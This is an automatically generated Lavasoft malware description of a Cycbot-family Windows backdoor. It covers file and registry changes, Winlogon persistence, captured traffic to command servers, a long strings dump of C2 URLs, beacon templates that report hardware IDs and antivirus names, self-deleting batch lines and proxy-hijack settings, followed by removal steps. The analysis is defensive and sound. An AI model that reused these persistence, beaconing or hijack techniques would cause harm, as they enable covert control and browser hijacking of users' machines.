Gen.Heur.FKP.6_0e02f5d800

by malwarelabrobot on August 28th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.FKP.6 (B) (Emsisoft), Gen:Heur.FKP.6 (AdAware), Backdoor.Win32.Cycbot.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0e02f5d80063330b630a276ae46597fa
SHA1: 8e3f070031b9d5ace888dd018b6f3509c0efcbb1
SHA256: 984f7b77176227e67cc36b81832c88d8165f3d3f73bff77962ccf1ba9434e24d
SSDeep: 3072:iA4sl3utQevtpXNW74gnsrfBalCqAwtBkhZFRA5/vjqkBB78KZQePy:2sl2BpdqVofgX1qLe/ukBnHP
Size: 174080 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2005-09-07 12:04:53
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1944

The Trojan injects its code into the following process(es):

%original file name%.exe:1680

Mutexes

The following mutexes were created/opened:

ShimCacheMutex
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{45BCA615-C82A-4152-8857-BCC626AE4C8D}
RasPbFile

File activity

The process %original file name%.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\NTUSER.DAT (3212 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (632 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (4896 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\02CDF.exe (84697 bytes)

Registry activity

The process %original file name%.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 07 D3 C7 48 17 45 97 5E C9 58 0E 33 E0 47 FB"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\02CDF.exe"

The process %original file name%.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 31 26 40 F7 73 F2 88 C7 22 41 8C D0 C5 A8 AA"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 497463 92160 5.01172 c8c83d7ee5a29b95d93a1b2d327a0cff
.rdata 503808 1864 2048 3.7671 f8c9f250023e5a24f3dbee3311c72fd5
.data 507904 78128 78336 5.54282 b6e21b9b78a942b36da5a01e1fcf4c6d
.rsrc 589824 4096 512 0.199774 e7f0cc72203a5e4e4a2712351b6bd0db

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://mektek.net/thelab/wiley.jpg?pr=gHZutDyMv5rJejbia9nrmsl6giWz+JZbVyA= 69.162.123.228
hxxp://renamesys5.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqD/cvTca3l74EgC1OjrPGpgfib1XGp5zpRPksUt+A/gSoSEU=&pr=41 141.8.225.80


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Bifrose/Cycbot Checkin 2
ET TROJAN Kazy/Kryptor/Cycbot Trojan Checkin 2

Traffic

GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqD/cvTca3l74EgC1OjrPGpgfib1XGp5zpRPksUt+A/gSoSEU=&pr=41 HTTP/1.0
Connection: close
Host: renamesys5.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 12:02:45 GMT
Server: Apache
Set-Cookie: gvc=902vr1561681658331585; expires=Tue, 20-Aug-2019 12:02:45 GMT; path=/; domain=renamesys5.com; httponly
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKrfIMFkSaoTSqKmC BrghK0CpDHc0MuVzmMHin8LIORhpXbped iYhSnZurWnEO0zcKcVIrzp026LVc5pMB9bUCAwEAAQ==_Kkx1Zk5laGt9XWhG8nsvhfVE5ocp8OhHzXtIrKwN89HBlATcTuWC584bCfmeMzSXDRpfEbfPLxPxpM8709YQ g==
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xht
ml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKrfIMFkSaoTSqKmC
 BrghK0CpDHc0MuVzmMHin8LIORhpXbped iYhSnZurWnEO0zcKcVIrzp026LVc5pMB9bU
CAwEAAQ==_Kkx1Zk5laGt9XWhG8nsvhfVE5ocp8OhHzXtIrKwN89HBlATcTuWC584bCfme
MzSXDRpfEbfPLxPxpM8709YQ g==">..<head><title>renamesys5
.com</title>..<meta http-equiv="Content-Type" content="text/h
tml; charset=">..<meta http-equiv="X-UA-Compatible" content="IE=
EmulateIE7">..<meta name="viewport" content="width=device-width,
 initial-scale=1, maximum-scale=1, user-scalable = no">..<style 
type="text/css">..*{margin:0; padding:0}..a{text-decoration:none; o
utline:none}..a:hover{text-indent:0; cursor:pointer}...clearfix:after{
visibility: hidden;display:block;font-size: 0;content: " ";clear: both
;height:0}..* html .clearfix{zoom:1} ..*:first-child html .clearfix{zo
om:1}..body{font-family:Arial, Helvetica, sans-serif; background:url(h
ttp://b.rmgserving.com/rmgpsc/7867/body-bg.gif) 0 0 repeat #000}...arr
ows{background:url(hXXp://a.rmgserving.com/rmgpsc/7867/arrows.jpg)}..#
main-wrap{background:url(hXXp://a.rmgserving.com/rmgpsc/7867/header-bg
.jpg) top center no-repeat; background-size:100% 100px}...container{wi
dth:960px; margin:0 auto}...header{height:100px}...leftblk{float:left;
 overflow:hidden}...leftblk img{float: left; margin-top: 23px; padding
-right: 15px;}...domain_name{float:left; line-height:100px; font-s
<<< skipped >>>


GET /thelab/wiley.jpg?pr=gHZutDyMv5rJejbia9nrmsl6giWz+JZbVyA= HTTP/1.0
Connection: close
Host: mektek.net
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 404 Not Found
Date: Thu, 21 Aug 2014 12:04:40 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 290
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /th
elab/wiley.jpg was not found on this server.</p>.<hr>.<
address>Apache/2.2.22 (Ubuntu) Server at mektek.net Port 80</add
ress>.</body></html>...

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1680:

`.rsrc
PSShH
SSj%S
<%u,V
<3%u1f
cmd.exe
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
>`Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
inflate 1.2.5 Copyright 1995-2010 Mark Adler
%d lines of %s read.
%d Function Prototypes found.
Including %d Library Functions.
.bss align=16
copy /b data.tmp   bss.tmp   code.tmp %s
copy /b code.tmp   data.tmp   bss.tmp %s
del *.tmp
copy /b data.tmp   code.tmp %s
al,%s
eax,%s
%s is not valid in:
Warning - Return from non-void function %s with no value
elend
.text
Warning -- "break" not supported in:
Error: %s not defined!
.data align=16
B1-1231 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
times %d db 0
times %d dd 0
XML-20003: missing token %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
Action: Check/update the input data to the correct keyword.
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20007: missing content model in element declaration at line %s, column %s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
\Windows NT
%s\%s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe,%s
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://zonedg.com/index.html
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=112
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
hXXp://renamesys5.com
hXXp://givishoolstome.com
hXXp://limfoklubs.com
hXXp://regfeedbackaccess.com
hXXp://umbrella-systems1.com
hXXp://monymouses.com
hXXp://onlinepdahelpforyou.com
hXXp://remarkreddomas.com
hXXp://transfersakkonline.com
hXXp://backupdomaintolevel.com
SELECT_RESERV_SRV_%d
%s.%s
stor.cfg
exec%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
hXXp://armoredlegion.com/305986.png
hXXp://armoredlegion.com/16354.png
hXXp://armoredlegion.com/716354_m61.png
hXXp://mektek.net/thelab/wiley.jpg
hXXp://knowledgesutra.com/img/temp/hi.cgi
hXXp://knowledgesutra.com/img/temp/head.png
hXXp://battleon.com/134.gif
hXXp://battleon.com/132.gif
hXXp://battleon.com/133.gif
hXXp://browsermmorpg.com/images/cpc.png
hXXp://browsermmorpg.com/images/cpc2.png
hXXp://browsermmorpg.com/img/intel.gif
hXXp://browsermmorpg.com/img/intel.jpg
hXXp://012webpages.com/christian12.jpg
hXXp://012webpages.com/christian13.jpg
hXXp://012webpages.com/christian14.jpg
hXXp://tri-countymech.com/g/livechat.png
hXXp://tri-countymech.com/g/logo.png
hXXp://tri-countymech.com/g/133.jpg
hXXp://tri-countymech.com/g/134.jpg
hXXp://electronicstheory.com/pics/valley.png
hXXp://electronicstheory.com/pics/sun.png
hXXp://classicbattletech.com/lhous3.gif
hXXp://classicbattletech.com/lhous4.gif
hXXp://classicbattletech.com/lhous5.gif
hXXp://classicbattletech.com/lhous6.gif
hXXp://engineeringcrossing.com/images/misc/23525.png
hXXp://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
POST %s HTTP/1.1
Content-Length: %u
HTTP/1.0 200 OK
HTTP/1.1 200 OK
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ldr.ini
reportfrommains.com
hXXp://%s/s.php?c=121&id=%s
onlinereportsystem.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
avgnt.exe
AVGIDSAgent.exe
avgwdsvc.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=112&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\DFB5
GetCPInfo
RegFlushKey
RegOpenKeyExA
RegCloseKey
WinHttpReadData
WinHttpOpenRequest
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpConnect
WinHttpCloseHandle
`.rdata
@.data
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

%original file name%.exe_1680_rwx_00400000_0008E000:

`.rsrc
PSShH
SSj%S
<%u,V
<3%u1f
cmd.exe
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
>`Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
inflate 1.2.5 Copyright 1995-2010 Mark Adler
%d lines of %s read.
%d Function Prototypes found.
Including %d Library Functions.
.bss align=16
copy /b data.tmp   bss.tmp   code.tmp %s
copy /b code.tmp   data.tmp   bss.tmp %s
del *.tmp
copy /b data.tmp   code.tmp %s
al,%s
eax,%s
%s is not valid in:
Warning - Return from non-void function %s with no value
elend
.text
Warning -- "break" not supported in:
Error: %s not defined!
.data align=16
B1-1231 Warning - %s re-defined!
B1-1282 Warning - %s re-defined!
times %d db 0
times %d dd 0
XML-20003: missing token %s at line %d, column %d
XML-20004: missing keyword %s at line %d, column %d
Action: Check/update the input data to the correct keyword.
XML-20006: unexpected text at line %d column %d; expected EOF
XML-20007: missing content model in element declaration at line %s, column %s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
\Windows NT
%s\%s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe,%s
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://zonedg.com/index.html
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=112
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
hXXp://renamesys5.com
hXXp://givishoolstome.com
hXXp://limfoklubs.com
hXXp://regfeedbackaccess.com
hXXp://umbrella-systems1.com
hXXp://monymouses.com
hXXp://onlinepdahelpforyou.com
hXXp://remarkreddomas.com
hXXp://transfersakkonline.com
hXXp://backupdomaintolevel.com
SELECT_RESERV_SRV_%d
%s.%s
stor.cfg
exec%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
hXXp://armoredlegion.com/305986.png
hXXp://armoredlegion.com/16354.png
hXXp://armoredlegion.com/716354_m61.png
hXXp://mektek.net/thelab/wiley.jpg
hXXp://knowledgesutra.com/img/temp/hi.cgi
hXXp://knowledgesutra.com/img/temp/head.png
hXXp://battleon.com/134.gif
hXXp://battleon.com/132.gif
hXXp://battleon.com/133.gif
hXXp://browsermmorpg.com/images/cpc.png
hXXp://browsermmorpg.com/images/cpc2.png
hXXp://browsermmorpg.com/img/intel.gif
hXXp://browsermmorpg.com/img/intel.jpg
hXXp://012webpages.com/christian12.jpg
hXXp://012webpages.com/christian13.jpg
hXXp://012webpages.com/christian14.jpg
hXXp://tri-countymech.com/g/livechat.png
hXXp://tri-countymech.com/g/logo.png
hXXp://tri-countymech.com/g/133.jpg
hXXp://tri-countymech.com/g/134.jpg
hXXp://electronicstheory.com/pics/valley.png
hXXp://electronicstheory.com/pics/sun.png
hXXp://classicbattletech.com/lhous3.gif
hXXp://classicbattletech.com/lhous4.gif
hXXp://classicbattletech.com/lhous5.gif
hXXp://classicbattletech.com/lhous6.gif
hXXp://engineeringcrossing.com/images/misc/23525.png
hXXp://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
POST %s HTTP/1.1
Content-Length: %u
HTTP/1.0 200 OK
HTTP/1.1 200 OK
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ldr.ini
reportfrommains.com
hXXp://%s/s.php?c=121&id=%s
onlinereportsystem.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
avgnt.exe
AVGIDSAgent.exe
avgwdsvc.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=112&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\DFB5
GetCPInfo
RegFlushKey
RegOpenKeyExA
RegCloseKey
WinHttpReadData
WinHttpOpenRequest
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpConnect
WinHttpCloseHandle
`.rdata
@.data
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1944

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\NTUSER.DAT (3212 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (632 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (4896 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\02CDF.exe (84697 bytes)

  4. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\02CDF.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now